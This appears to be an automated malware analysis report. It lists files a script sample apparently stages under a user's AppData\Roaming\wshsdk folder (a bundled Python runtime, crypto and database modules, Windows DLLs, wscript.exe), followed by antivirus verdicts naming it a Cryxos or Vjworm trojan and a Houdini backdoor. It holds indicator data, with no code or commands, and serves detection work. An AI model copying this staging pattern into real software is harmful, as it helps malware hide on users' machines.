file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\_compression.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\adodbapi\examples\__pycache__\xls_read.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\socketserver.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\io.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\token.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\adodbapi\examples\__pycache__\xls_write.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\ctypes\__pycache__\wintypes.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\signal.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\copy.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\pprint.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\shlex.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\_bootlocale.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\_markupbase.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\_collections_abc.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\adodbapi\__pycache__\process_connect_string.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\dis.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\adodbapi\test\__pycache__\tryconnection2.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\DLLs\python_lib.cat
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\encodings\__pycache__\__init__.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\uu.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\quopri.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\__pycache__\easy_install.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\textwrap.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\calendar.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\tempfile.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\adodbapi\examples\__pycache__\db_print.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\functools.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\py_compile.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\abc.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\heapq.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\cgi.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\encodings\__pycache__\cp1252.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\enum.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\genericpath.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\adodbapi\__pycache__\ado_consts.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\sre_parse.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\ntpath.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\keyword.cpython-37.pyc
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\__pycache__\argparse.cpython-37.pyc
file C:\Windows\SysWOW64\wscript.exe
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-console-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-datetime-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-debug-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-errorhandling-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-file-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-file-l1-2-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-file-l2-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-handle-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-heap-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-interlocked-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-libraryloader-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-localization-l1-2-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-memory-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-namedpipe-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-processenvironment-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-processthreads-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-processthreads-l1-1-1.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-profile-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-rtlsupport-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-string-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-synch-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-synch-l1-2-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-sysinfo-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-timezone-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-core-util-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-conio-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-convert-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-environment-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-filesystem-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-heap-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-locale-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-math-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-multibyte-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-private-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-process-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-runtime-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-stdio-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-string-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-time-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\api-ms-win-crt-utility-l1-1-0.dll
file C:\Users\test22\AppData\Roaming\wshsdk\DLLs\_ctypes.pyd
file C:\Users\test22\AppData\Roaming\wshsdk\DLLs\_sqlite3.pyd
file C:\Users\test22\AppData\Roaming\wshsdk\DLLs\libcrypto-1_1.dll
file C:\Users\test22\AppData\Roaming\wshsdk\DLLs\libssl-1_1.dll
file C:\Users\test22\AppData\Roaming\wshsdk\DLLs\select.pyd
file C:\Users\test22\AppData\Roaming\wshsdk\DLLs\sqlite3.dll
file C:\Users\test22\AppData\Roaming\wshsdk\DLLs\tcl86t.dll
file C:\Users\test22\AppData\Roaming\wshsdk\DLLs\tk86t.dll
file C:\Users\test22\AppData\Roaming\wshsdk\Lib\site-packages\Crypto\Cipher\_ARC4.cp37-win32.pyd
MicroWorld-eScan JS:Trojan.Cryxos.3662
FireEye JS:Trojan.Cryxos.3662
CAT-QuickHeal VBS.Agent.34768
McAfee VBS/Autorun.worm.aaha
Sangfor Trojan.Generic-JS.Save.b6586d32
Cyren JS/Agent.AGG4!Eldorado
Symantec Trojan.Gen.NPE
ESET-NOD32 JS/Vjworm.CD
Avast JS:ADODB-BL [Expl]
ClamAV Txt.Packed.Cryxos-7111887-0
Kaspersky Trojan.Script.Agent.br
BitDefender JS:Trojan.Cryxos.3662
NANO-Antivirus Trojan.Script.Dropper.foxxbq
Tencent Heur:Trojan.Script.LS_Gencirc.7223621.0
Ad-Aware JS:Trojan.Cryxos.3662
Emsisoft JS:Trojan.Cryxos.3662 (B)
Comodo Worm.JS.Vjworm.AK@8cyo73
DrWeb PowerShell.Packed.25
TrendMicro HEUR_JSRANSOM.O4
McAfee-GW-Edition BehavesLike.VBS.Dropper.cj
Microsoft Trojan:VBS/Irsaz.B
Arcabit JS:Trojan.Cryxos.DE4E
GData JS:Trojan.Cryxos.3662
AhnLab-V3 Backdoor/JS.Agent.S1250
MAX malware (ai score=88)
Rising Backdoor.Houdini/JS!1.C2BA (CLASSIC)
Fortinet JS/Agent.BM!tr
AVG JS:ADODB-BL [Expl]